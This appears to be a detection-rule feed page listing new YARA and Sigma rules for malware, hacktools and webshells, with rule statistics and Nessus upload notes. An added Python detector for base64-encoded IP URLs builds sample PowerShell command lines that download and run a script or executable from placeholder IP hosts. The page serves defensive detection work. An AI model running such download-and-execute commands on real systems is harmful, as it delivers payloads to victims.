currently serving 23766 YARA rules and 4457 Sigma rules
New Rules per Day
Newest YARA Rules
This table shows the newest additions to the YARA rule set
Rule
Description
Date
Ref
MAL_Kernel_RegPhantom_Mar26
Detects RegPhantom, a kernel-mode rootkit that allows an attacker to inject arbitrary code from unprivileged user mode into kernel mode and execute it.
19.03.2026
MAL_LNK_File_With_PE_Content_Mar26
Detects Windows shortcut (.lnk) files that contain portable executable (PE) content, indicating possible malware delivery.
12.03.2026
MAL_MacOS_Shub_Stealer_Mar26
Detects Shub stealer that harvests browser cookies, keychain items, and file metadata, encodes data in Base64, and exfiltrates to a remote C2 server via HTTP POST requests
11.03.2026
MAL_FireRain_RAT_Mar26
Detects FireRain RAT written in Go that uses KCP-over-UDP encrypted C2 with remote desktop, hidden shell, file transfer, and Startup folder hijack persistence
10.03.2026
SUSP_ControlFlow_Obfuscation_Mar26
Detects control flow obfuscation with opaque predicates commonly used in malware such as Silver Dragon
10.03.2026
MAL_Bibi_Wiper_Mar26
Detects BibiWiper that encrypts files, overwrites disk with random data, and destroys the MBR to render systems unbootable
09.03.2026
SUSP_MacOS_AppleScript_Curl_Command_Mar26
Detects suspicious macOS AppleScript code executing curl via 'do shell script', often used by malware to retrieve remote C2 domains or payloads.
09.03.2026
HKTL_Flashingestor_Mar26
Detects flashingestor, a Go based hacktool for Active Directory collection
09.03.2026
SUSP_OBFUSC_Base64_WAR_Mar26
Detects base64-encoded WAR files, which is unusual and could be part of a PoC or an attack in which the WAR file (usually a web shell) is obfuscated to evade detection. Note: This detection is based on common characteristics typically associated with the mentioned threats, must be considered a clue and does not conclusively prove maliciousness.
08.03.2026
SUSP_PS1_Loader_Mar26
Detects obfuscated PowerShell execution via Invoke-Expression with nested parentheses, web content retrieval using UseBasicParsing with string replacement for payload reconstruction, and base64-encoded JavaScript
06.03.2026
MAL_OBFUSC_VBS_Script_Mar26
Detects an obfuscated VBS script seen being used to deliver and execute other payloads
05.03.2026
MAL_PY_Stealer_Mar26
Detects a Python-based infostealer that targets browsers, decrypts saved passwords and credit card data, and exfiltrates them to a remote C2 server
05.03.2026
MAL_Moonrise_RAT_Mar26
Detects MoonRise RAT which is a remote access trojan that provides attackers with unauthorized access and control over infected systems, often used for espionage, data theft, and other malicious activities.
05.03.2026
MAL_NET_Force_BSOD_Mar26
Detects code that deliberately triggers a Windows Blue Screen of Death (BSOD) by forcing a system crash. Malicious actors use this technique to disrupt operations or temporarily render the victim system unusable.
03.03.2026
SUSP_Claude_Config_File_Mar26
Detects untrusted project hooks and MCP user consent bypass in Claude configuration files
03.03.2026
SUSP_Claude_Env_Overwrite_Mar26
Detects suspicious overwrite of environment variable ANTHROPIC_BASE_URL
03.03.2026
MAL_NET_Excessive_Anti_Analysis_Mar26
Detects excessive anti-analysis functions found in commodity malware.
03.03.2026
MAL_DPRK_RAT_Mar26
Detects a DPRK RAT that performs basic system reconnaissance and reports execution status messages such as file existence checks and host identification
02.03.2026
MAL_MuddyWater_Downloader_Mar26
Detects a downloader that communicates over HTTPS to register infected hosts, poll for operator approval, and stage disguised payloads
02.03.2026
HKTL_KVC_Mar26
Detects KVC, a hacktool which enables unsigned driver loading via DSE bypass and PP/PPL manipulation for LSASS memory dumping on modern Windows with HVCI/VBS
02.03.2026
WEBSHELL_CSHTML_Mar26
Detects CSHTML based webshells
02.03.2026
HKTL_ADCSDevilCOM_Mar26
Detects ADCSDevilCOM, a hacktool for requesting certificates from ADCS using DCOM over SMB.
02.03.2026
MAL_NET_Quasar_Multi_Mar26
Detects QuasarRAT and derivative implementations like AsyncRAT. Quasar features full remote access, persistence and data exfiltration capabilities.
01.03.2026
MAL_Prometei_NetDefender_Module_Feb26
Detects Prometei RDP lockout module - subscribes to failed login events (4625) and blocks repeat offenders via Windows Firewall to maintain exclusive access to compromised hosts.
28.02.2026
MAL_Prometei_Botnet_Encrypted_Main_Module_Feb26
Detects the main module of the Prometei botnet, which decrypts itself in memory and is responsible for the core functionality of the botnet, including command and control communication, payload management, and execution of malicious activities on infected systems.
27.02.2026
MAL_Prometei_Botnet_Linux_Variant_Feb26
Detects a Linux variant of the Prometei botnet, which is a sophisticated malware family that targets both Windows and Linux systems
27.02.2026
HKTL_Go_Golinhound_Feb26
Detects Golinhound, a Go-based tool designed for reconnaissance and information gathering on Linux systems, which can be used by attackers to collect system information, network details, and other sensitive data for further exploitation or lateral movement
27.02.2026
Successful YARA Rules in Set
This table shows statistics of the best rules with lowest AV detection rates (rules created in the last 12 months, matches of the last 14 days)
Rule
Average AV Detection Rate
Sample Count
Info
VT
Latest YARA Matches with Low AV Detection Rate
This table lists the last matches with low AV detection rates (between 0 and 15 AV engines matched)
Rule
AVs
Hash
VT
SUSP_NET_Shellcode_Loader_Indicators_Jan24
12
6aaa0ec19b1ff4e5943116600f8ae24184621c0dac03c36dba209e685e77f435
PUA_ConnectWise_ScreenConnect_Mar23
10
4a8da02e81c7dcd2b6e4f868e784821a0eb04a5733ff16fcc38803b62b18078d
SUSP_EXPL_ShellCode_Loader_Nov22_1
7
8bf173be47eff0fd4041f0158088e577b3937fc83801d36dca88639d8a1a6eb3
SUSP_Credential_Stealer_Indicators_Jul23_1
4
f42a5ca13caf7ee5b2b4fba059c54585f5cf13e84357ec70026c2f5dcf664533
SUSP_Credential_Stealer_Indicators_Jul23_2
4
f42a5ca13caf7ee5b2b4fba059c54585f5cf13e84357ec70026c2f5dcf664533
SUSP_HKTL_Hacktool_Strings_Oct21_1
10
af61d8718c433c00f95519f000fe3e73cf9abcef7a1d494f9567a5efaa8b4e81
SUSP_HKTL_CobaltStrike_PS1_Loader_Indicator_Nov23_2
8
4732451eee9a1cbb9dfc70c41f416df4a89733f6690979d1696ac6a5e767e524
PUA_ConnectWise_ScreenConnect_Mar23
13
d0ee1f0af48ba70c173f1e7bdff15ef43aa4292af9f4fa559e10f4f72f0a1c09
SUSP_PS1_IEX_From_Download_Dec22_1
2
73c1a09c851a8e7cd91d4de71e5017c9507002ef82ee740b8a1304565bf4399b
WEBSHELL_PHP_BeginsWith_eval_Sep21
2
713d45b69459381a19a618629f28de8d524f3cbe3ca6468bd011d95bbb6bb1ad
YARA Rules Per Category
This list shows the number of YARA rules in the subscribable categories (categories overlap as a rule can be in 'n' categories)
Tag
Count
Malware
7515
Threat Hunting (not subscribable, only in THOR scanner)
5822
APT
5054
Hacktools
4834
Webshells
2400
Exploits
722
Newest Sigma Rules
This table shows the newest additions to the Sigma rule set
Rule
Description
Date
Ref
Info
Netsh Advfirewall Isolate Network
Detects execution of netsh.exe commands that modify Windows Advanced Firewall settings to block both inbound and outbound traffic, effectively isolating the system from network communication. This technique may be used by attackers to evade detection, prevent remediation, or disrupt incident response activities.
20.02.2026
ICACLS Deny Permission Abuse
Detects execution of icacls.exe with deny arguments targeting broad principals such as Everyone or Administrators, which may indicate malicious permission tampering.
20.02.2026
Suspicious Child Processes Spawned by AnyDesk
Detects suspicious child processes spawned by AnyDesk process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by Chrome Remote Desktop
Detects suspicious child processes spawned by Chrome Remote Desktop process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by LogMeIn
Detects suspicious child processes spawned by LogMeIn process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by RemotePC
Detects suspicious child processes spawned by RemotePC process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by ScreenConnect
Detects suspicious child processes spawned by ScreenConnect process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by SlashTop
Detects suspicious child processes spawned by SlashTop process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by Splashtop
Detects suspicious child processes spawned by Splashtop process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by TightVNC
Detects suspicious child processes spawned by TightVNC process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by TeamViewer
Detects suspicious child processes spawned by TeamViewer process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by UltraVNC
Detects suspicious child processes spawned by UltraVNC process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by VNCConnect
Detects suspicious child processes spawned by VNCConnect process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by ZohoAssist
Detects suspicious child processes spawned by ZohoAssist process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by AeroAdmin
Detects suspicious child processes spawned by AeroAdmin process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by AMMYYAdmin
Detects suspicious child processes spawned by AMMYYAdmin process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
Suspicious Child Processes Spawned by Remote Utilities
Detects suspicious child processes spawned by Remote Utilities process. This could indicate the presence of a remote management tool (RMM) or remote access tool (RAT) on the system.
Threat actors may use these tools to gain unauthorized access to systems and networks and perform malicious activities.
11.02.2026
File Operation via .NET Class
Detects the use of .NET class methods in command lines, which can be used for unauthorized file operations such as copying files.
Because Windows offers many ordinary ways to copy files, an adversary may choose this rarely used method to avoid detection.
06.02.2026
Suspicious Double Extension Files in Linux
Detects files with double extensions in Linux systems, which could be an attempt to disguise executable content as harmless documents.
05.02.2026
Suspicious Linux Command Patterns
Detects suspicious command line patterns that may indicate malicious activity such as decoding base64 content to files in some folder and executing it.
05.02.2026
Suspicious Double Extension File Execution on Linux
Detects suspicious use of executable extensions like .sh, .py or .pl after a non-executable file extension to disguise malicious files in Linux environments
05.02.2026
Suspicious Download and Execution Combo in Linux
Detects suspicious command line patterns where a download command line utility is executed in combination with other suspicious command line utilities.
This could indicate potential malicious activity such as downloading and various other actions like decoding, changing permissions, or executing the downloaded file or creating persistence.
05.02.2026
Suspicious Base64 Encoded IP in PowerShell Execution
Detects PowerShell script blocks that contain base64-encoded IP addresses, a technique commonly used for obfuscation and defense evasion.
Threat actors may leverage this method to download and execute secondary payloads from IP addresses - often their command and control (C2) servers or other malicious infrastructure.
By encoding these URLs in base64 within PowerShell commands, adversaries attempt to bypass detection mechanisms and evade user scrutiny.
This rule helps identify suspicious activity where PowerShell is used to retrieve content from IPs via base64-encoded strings, which is rarely seen in legitimate software.
04.02.2026
Suspicious Base64 Encoded IP in Command Line
Detects processes with command lines containing base64-encoded IP addresses, which may indicate obfuscation or evasion attempts.
Threat actors often host their secondary malicious payloads on IP addresses, potentially their C&C servers or other hosting infrastructure.
A common dropper technique is to download and execute such a secondary payload directly from an IP address.
To hide the command line from normal user scrutiny, threat actors may base64-encode the script or command line arguments that download and execute the secondary payload.
04.02.2026
Uncommon File Created by Notepad++ Updater Gup.EXE
Detects when the Notepad++ updater (gup.exe) creates files in suspicious or uncommon locations.
This could indicate potential exploitation of the updater component to deliver malware or other unwanted files.
03.02.2026
Tiny C Compiler Runtime Execution
Detects execution of Tiny C Compiler (TCC) which compiles and executes C code directly in memory.
This technique was observed in Chrysalis backdoor campaigns where attackers renamed tcc.exe to svchost.exe and used it
to load shellcode from .c files directly into memory, bypassing traditional detection methods.
03.02.2026
Suspicious Child Process of Notepad++ Updater - GUP.Exe
Detects suspicious child process creation by the Notepad++ updater process (gup.exe).
This could indicate potential exploitation of the updater component to deliver malware.
03.02.2026
Renamed TinyCC (TCC) Compiler Execution
Detects the execution of a renamed TinyCC (TCC) Compiler (tcc.exe)
Attackers have been observed renaming tcc.exe to masquerade as legitimate Windows binaries (e.g., svchost.exe) to compile and execute malicious C code in memory, such as shellcode loaders.
This technique was observed in Chrysalis backdoor attacks.
03.02.2026
Reflective Loading from Masqueraded File - PowerShell
Detects a PowerShell scriptblock pattern where a masqueraded file (e.g., a .png) is read into a byte array and then reflectively loaded as a .NET assembly.
This technique is used by various threat actors to evade file-based detections.
02.02.2026
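The two "Suspicious Base64 Encoded IP" Sigma rules above, like the SUSP_OBFUSC_Base64_WAR YARA rule in the first table, look for a known plaintext inside a base64 blob without decoding it. Base64 maps 3 bytes to 4 characters, so the encoding of a substring depends on its byte offset modulo 3 and a robust detection has to carry all three alignment variants (and, for PowerShell -EncodedCommand, the UTF-16LE form as well). The following Python is an added example of that technique, not Nextron's rule logic or code; the command lines, IP addresses and payload bytes are constructed for illustration.

```python
import base64
from typing import List, Optional

# Added example (not Nextron's rule logic): match a plaintext pattern inside a
# base64 blob without decoding it. Leading characters whose bits mix with the
# filler bytes in front, and trailing characters (including '=') whose bits mix
# with whatever follows the pattern, are stripped from each variant.
_START = (0, 2, 3)      # chars polluted by i filler bytes before the pattern
_END = (None, -3, -2)   # chars polluted by the bytes after it, by total length mod 3


def b64_variants(pattern: bytes) -> List[str]:
    """Return the three base64 alignment variants of pattern."""
    variants = []
    for i in range(3):
        encoded = base64.b64encode(b"\x00" * i + pattern).decode("ascii")
        variants.append(encoded[_START[i]:_END[(len(pattern) + i) % 3]])
    return variants


def variants_cover_all_offsets(pattern: bytes) -> bool:
    """Self-check: whatever precedes or follows the pattern, one variant matches."""
    for prefix in (b"", b"\xff", b"\xff\xff"):
        blob = base64.b64encode(prefix + pattern + b"\xff\xff").decode("ascii")
        if not any(v in blob for v in b64_variants(pattern)):
            return False
    return True


def encoded_pattern_in(text: str, pattern: bytes, wide: bool = False) -> Optional[str]:
    """Return the variant of base64(pattern) found in text, or None.
    wide=True uses the UTF-16LE form, as produced for PowerShell -EncodedCommand."""
    raw = pattern.decode("latin-1").encode("utf-16-le") if wide else pattern
    for variant in b64_variants(raw):
        if variant in text:
            return variant
    return None


# URL scheme followed directly by a digit: an IP literal rather than a host name.
# (A host like 1stbank.example would match too; the rules above treat this as a clue.)
IP_URL_PREFIXES = [s + str(d).encode() for s in (b"http://", b"https://") for d in range(1, 10)]
ZIP_LOCAL_HEADER = b"PK\x03\x04"  # a WAR is a zip archive; 4 bytes yields short tokens


def classify(cmdline: str) -> List[str]:
    """Label a command line with the encoded artefacts it carries."""
    labels = []
    if any(encoded_pattern_in(cmdline, p) for p in IP_URL_PREFIXES):
        labels.append("b64_ip_url")
    if any(encoded_pattern_in(cmdline, p, wide=True) for p in IP_URL_PREFIXES):
        labels.append("b64_ip_url_wide")
    if encoded_pattern_in(cmdline, ZIP_LOCAL_HEADER):
        labels.append("b64_zip_header")
    return labels


def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")


# Constructed sample command lines (hosts, paths and payload bytes are made up).
SAMPLE_IEX = ('powershell -nop -w hidden -c "IEX((New-Object Net.WebClient).DownloadString('
              "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
              + _b64(b"http://192.168.1.10/load.ps1") + "'))))\"")
SAMPLE_ENC = "powershell -EncodedCommand " + _b64("iwr http://10.0.0.5/a.exe".encode("utf-16-le"))
SAMPLE_WAR = "certutil -decode app.b64 app.war # blob: " + _b64(b"PK\x03\x04\x14\x00\x08\x00" + b"\x00" * 16)
SAMPLE_BENIGN = 'powershell -c "Get-Date"; echo ' + _b64(b"SELECT name FROM users")

if __name__ == "__main__":
    for p in (b"http://1", b"PK\x03\x04"):
        print(p, b64_variants(p))
    for name, cmd in (("iex", SAMPLE_IEX), ("enc", SAMPLE_ENC), ("war", SAMPLE_WAR), ("benign", SAMPLE_BENIGN)):
        print(f"{name:>6}: {classify(cmd)}")
```

The short tokens produced by a 4-byte zip header ("UEsDB" and its two shifted forms) will hit benign base64 now and then, which is why the WAR rule's own description calls the match a clue rather than proof; pairing the header with more bytes of a typical local file header, or with surrounding context, tightens it at the cost of coverage.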
YARA/SIGMA Rule Count
Rule Type   Community Feed   Nextron Private Feed
Yara        2717             21049
Sigma       3540             917
Sigma Rules Per Category (Community)
Type
Count
windows / process_creation
1331
windows / registry_set
219
windows / file_event
206
windows / ps_script
165
windows / security
160
linux / process_creation
131
windows / image_load
114
webserver
82
windows / system
74
macos / process_creation
68
aws / cloudtrail
55
proxy
54
linux / auditd
53
windows / network_connection
53
azure / activitylogs
42
windows / registry_event
40
azure / auditlogs
38
windows / ps_module
33
windows / application
31
windows / dns_query
27
windows / process_access
25
azure / signinlogs
24
okta / okta
22
azure / riskdetection
19
opencanary / application
18
windows / pipe_created
18
rpc_firewall / application
17
windows / windefend
16
github / audit
16
linux
16
gcp / gcp.audit
16
bitbucket / audit
14
windows / file_delete
13
linux / file_event
13
m365 / threat_management
13
cisco / aaa
12
windows / create_remote_thread
12
windows / driver_load
10
windows / registry_delete
10
kubernetes / application / audit
10
windows / codeintegrity-operational
10
windows / ps_classic_start
9
dns
9
windows / appxdeployment-server
9
windows / create_stream_hash
9
windows / firewall-as
8
windows / msexchange-management
8
antivirus
7
fortigate / event
7
windows / file_access
7
azure / pim
7
windows / bits-client
7
zeek / smb_files
7
gcp / google_workspace.admin
7
windows / dns-client
6
jvm / application
5
kubernetes / audit
5
zeek / dns
5
linux / network_connection
5
zeek / http
5
windows / taskscheduler
4
windows / iis-configuration
4
zeek / dce_rpc
4
windows / sysmon
4
windows / wmi_event
3
windows / powershell-classic
3
windows / ntlm
3
linux / sshd
3
windows / registry_add
3
m365 / audit
3
macos / file_event
3
spring / application
2
onelogin / onelogin.events
2
firewall
2
linux / syslog
2
windows / security-mitigations
2
windows / dns-server
2
apache
2
linux / sudo
1
velocity / application
1
cisco / duo
1
cisco / bgp
1
nginx
1
windows / dns-server-analytic
1
cisco / ldp
1
windows / ldap
1
windows / wmi
1
windows / printservice-admin
1
database
1
windows / ps_classic_provider_start
1
windows / printservice-operational
1
linux / guacamole
1
windows / lsa-server
1
django / application
1
linux / auth
1
linux / clamav
1
windows / appmodel-runtime
1
fortios / sslvpnd
1
linux / cron
1
juniper / bgp
1
windows / applocker
1
windows / openssh
1
cisco / syslog
1
huawei / bgp
1
windows / appxpackaging-om
1
windows / smbclient-connectivity
1
windows / smbserver-connectivity
1
windows / process_tampering
1
windows / raw_access_thread
1
paloalto / file_event / globalprotect
1
windows / capi2
1
windows / shell-core
1
windows / file_change
1
nodejs / application
1
paloalto / appliance / globalprotect
1
windows / certificateservicesclient-lifecycle-system
1
windows / microsoft-servicebus-client
1
linux / vsftpd
1
zeek / x509
1
windows / file_executable_detected
1
python / application
1
windows / diagnosis-scripted
1
windows / smbclient-security
1
m365 / exchange
1
zeek / rdp
1
windows / file_rename
1
windows / sysmon_error
1
ruby_on_rails / application
1
m365 / threat_detection
1
zeek / kerberos
1
windows / terminalservices-localsessionmanager
1
windows / sysmon_status
1
sql / application
1
windows / driver-framework
1
windows
1
Sigma Rules Per Category (Nextron Private Feed)
Type
Count
windows / process_creation
441
windows / ps_script
83
windows / registry_set
83
windows / file_event
46
windows / image_load
46
linux / process_creation
41
windows / wmi
29
windows / security
25
proxy
12
windows / system
11
windows / network_connection
8
windows / registry_event
8
windows / kernel-event-tracing
6
windows / ntfs
5
windows / ps_module
5
windows / pipe_created
4
windows / sense
4
windows / taskscheduler
4
windows / create_remote_thread
4
windows / registry_delete
4
windows / hyper-v-worker
3
windows / ps_classic_script
3
webserver
3
windows / vhd
3
windows / application-experience
3
windows / driver_load
3
windows / codeintegrity-operational
2
windows / file_delete
2
windows / kernel-shimengine
2
linux / file_event
2
macos / process_creation
2
windows / windefend
2
windows / process_access
2
windows / process-creation
2
windows / bits-client
2
windows / dns_query
2
windows / file_access
2
windows / registry-setinformation
1
windows / file_rename
1
windows / firewall-as
1
dns
1
windows / application
1
windows / amsi
1
windows / registry_add
1
windows / audit-cve
1
Tenable Nessus
Requirement: Privileged Scan
- YARA Scanning with Nessus works only when scanning with credentials (privileged scan)
YARA Scanning with Nessus
- You can only upload a single .yar file
- Filesystem scan has to be activated
- You have to define the target locations
- The Nessus plugin ID will be 91990
- Only files with the following extensions can be scanned: .application, .asp, .aspx, .bat, .chm, .class, .cmd, .com, .cp, .csh, .dl, .doc, .docx, .drv, .exe, .gadget, .hta, .inf, .ins, .inx, .isu, .jar, .job, .jpeg, .jpg, .js, .jse, .jsp, .lnk, .msc, .msi, .msp, .mst, .paf, .pdf, .php, .pif, .ppt, .pptx, .ps1, .ps1xm, .ps2, .ps2xm, .psc1, .psc2, .reg, .rgs, .scf, .scr, .sct, .shb, .shs, .swf, .sys, .u3p, .vb, .vbe, .vbs, .vbscript, .ws, .wsf, .xls
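Because Nessus accepts a single .yar file, a rule set that lives in several files has to be concatenated before upload, and two things break a naive concatenation: YARA refuses to compile a set in which the same rule identifier appears twice, and `include` directives point at files that will not be present on the Nessus side. The following Python is an added example of such a pre-upload merge, not a Nextron or Tenable tool; the two rule files are constructed samples, and the treatment of `include` as an error is an assumption about the single-file upload, not something the page documents. It hoists `import` statements to the top of the merged file, deduplicates them, and reports duplicate identifiers and includes so they can be fixed by hand before the file is uploaded.

```python
import re
from typing import Dict, List, Tuple

# Added example: merge several YARA files into the one .yar file Nessus accepts.
RULE_DECL = re.compile(r"^\s*(?:(?:private|global)\s+){0,2}rule\s+([A-Za-z_][A-Za-z0-9_]*)", re.MULTILINE)
IMPORT_DECL = re.compile(r'^\s*import\s+"([^"]+)"\s*$', re.MULTILINE)
INCLUDE_DECL = re.compile(r'^\s*include\s+"([^"]+)"\s*$', re.MULTILINE)
# Comments are stripped only for identifier parsing; "rule" inside a string is not expected
# at the start of a line, but a "/*" inside a string would confuse this simple stripper.
COMMENT = re.compile(r"/\*.*?\*/|//[^\n]*", re.DOTALL)


def rule_names(text: str) -> List[str]:
    """Rule identifiers declared in a YARA source, in order of appearance."""
    return RULE_DECL.findall(COMMENT.sub("", text))


def merge_rule_sets(sources: Dict[str, str]) -> Tuple[str, dict]:
    """Concatenate {file name: content} into one source and report what needs fixing.

    Duplicate identifiers are a compile error in YARA; includes are assumed (see
    lead-in) to be unresolvable after a single-file upload, so both mark the set not ok."""
    seen: Dict[str, str] = {}
    report: dict = {"duplicates": [], "includes": [], "imports": []}
    bodies = []
    for name, text in sources.items():
        for rule in rule_names(text):
            if rule in seen:
                report["duplicates"].append((rule, seen[rule], name))
            else:
                seen[rule] = name
        for module in IMPORT_DECL.findall(text):
            if module not in report["imports"]:
                report["imports"].append(module)
        for included in INCLUDE_DECL.findall(text):
            report["includes"].append((name, included))
        body = INCLUDE_DECL.sub("", IMPORT_DECL.sub("", text)).strip()
        bodies.append(f"// ---- {name} ----\n{body}")
    header = "".join(f'import "{m}"\n' for m in report["imports"])
    merged = header + "\n" + "\n\n".join(bodies) + "\n"
    report["rule_count"] = len(seen)
    report["ok"] = not report["duplicates"] and not report["includes"]
    return merged, report


# Constructed sample rule files (not rules from the Valhalla feed).
SRC_A = '''import "pe"

rule SUSP_Example_Loader_A {
    meta:
        description = "constructed sample rule"
    strings:
        $s1 = "FromBase64String" ascii wide
    condition:
        uint16(0) == 0x5a4d and $s1
}
'''

SRC_B = '''include "common.yar"
import "pe"

private rule Shared_Helper {
    condition: pe.number_of_sections > 2
}

rule SUSP_Example_Loader_A {
    // duplicate identifier: YARA refuses to compile this together with SRC_A
    condition: Shared_Helper and filesize < 2MB
}

rule WEBSHELL_Example_B {
    strings:
        $e = "eval(" ascii
    condition:
        $e
}
'''

if __name__ == "__main__":
    merged, report = merge_rule_sets({"a.yar": SRC_A, "b.yar": SRC_B})
    print(report)
    if report["ok"]:
        with open("nessus_upload.yar", "w", encoding="utf-8") as fh:
            fh.write(merged)
    else:
        print("fix duplicates/includes before uploading")
```

If yara-python is installed, `yara.compile(source=merged)` on the result is the definitive check before upload; the regex pass above only catches the two problems a file-level merge introduces, not syntax errors inside the rules themselves.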
